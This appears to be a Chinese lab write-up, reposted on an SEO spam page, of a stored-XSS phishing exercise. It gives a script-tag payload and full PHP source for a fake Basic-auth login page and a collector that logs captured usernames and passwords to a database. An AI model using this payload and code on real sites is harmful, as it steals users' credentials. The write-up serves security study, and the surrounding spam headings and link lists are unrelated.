当前位置: 首页 > news >正文

潍坊做网站教程seo技术外包公司

潍坊做网站教程,seo技术外包公司,做动漫主题的网站,做网站开发一、复现过程 1、payload <script src"http://127.0.0.1/pkxss/xfish/fish.php"></script> 将这段代码插入到含有储存xss的网页上&#xff0c;如下留言板 2、此时恶意代码已经存入数据库&#xff0c;并存在网页中&#xff0c;当另一个用户打开这个网页…

一、复现过程

1、payload

<script src="http://127.0.0.1/pkxss/xfish/fish.php"></script>

将这段代码插入到含有储存xss的网页上,如下留言板

2、此时恶意代码已经存入数据库,并存在网页中,当另一个用户打开这个网页时,就会触发xss恶意代码,被跳转的另一个页面,并弹出登入框

3、这个时候如果输入账号密码,就会被恶意构造的后台窃取储存

二、分析流程

1、fish.php:文件源码分析,这是恶意构造的页面,即恶意插入xss代码中的url:127.0.0.1/pkxss/xfish/fish.php

即复现步骤2的恶意构造登入页面的源码

这是一个basic认证,你输入账号密码时会将这些信息记录并重定向到http://127.0.0.1/pkxss/xfish/xfish.php?页面

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的infoheader('Content-type:text/html;charset=utf-8');header("WWW-Authenticate: Basic realm='认证'");header('HTTP/1.0 401 Unauthorized');echo 'Authorization Required.';exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IPheader("Location: http://127.0.0.1/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");
}?>

2、xfish.php:他会获取到传入过来的账号密,并将这些存入数据库

<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();if(!empty($_GET['username']) && !empty($_GET['password'])){$username=$_GET['username'];$password=$_GET['password'];$referer="";$referer.=$_SERVER['HTTP_REFERER'];$time=date('Y-m-d g:i:s');$query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";$result=mysqli_query($link, $query);
}?>

总结:

1、在含有xss漏洞页面,插入一个一个恶意script代码,代码会触发跳转页到恶意页面

http://www.yidumall.com/news/97201.html

相关文章:

  • wordpress 页面路由杭州优化seo公司
  • 零度业务网站关键词查询网
  • 市政府网站建设会议seo在线排名优化
  • 洛阳建设银行官方网站网络推广怎么找客户资源
  • WordPress美化评论通知邮件样式大金seo
  • 网站客服代码左右seo资料网
  • 建设购物网站的目的营销软文代写
  • 独立站如何推广互联网营销策略有哪些
  • 企业门户网站建设情况seo推广优化方案
  • wordpress导出html站内优化主要从哪些方面进行
  • 青岛营销型网站设计公司谷歌浏览器网页版在线
  • 创意型网站建设网络营销主要干什么
  • web前端考试报名官网沈阳关键词快照优化
  • 深圳西乡网站制作网站分析培训班
  • c2c交易平台官方网站公司网站设计的内容有哪些
  • 公司网站域名解析谁来做站长工具综合查询ip
  • 老薛主机做两个网站网店代运营和推广销售
  • 广东深圳软件开发公司燃灯seo
  • 阿里云智能logo设计网站舆情网站直接打开
  • 弄几个的网站培训网站搭建
  • 上海响应式网站设计最新收录查询
  • 企业系统定制开发青岛百度推广优化
  • 兄弟网络(西安网站建设制作公司)企业网站的作用
  • 缅甸做网站技能培训学校
  • 网上找人做动态网站的报价如何创建自己的网站
  • 加强全国政府网站建设监督检查备案查询网
  • 哪些网站可以在线做动图百度企业推广怎么收费
  • 企业网站seo优化公司广告软文小故事800字
  • 黄骅港疫情seo基础培训
  • 泰和县建设局网站站长工具是干嘛的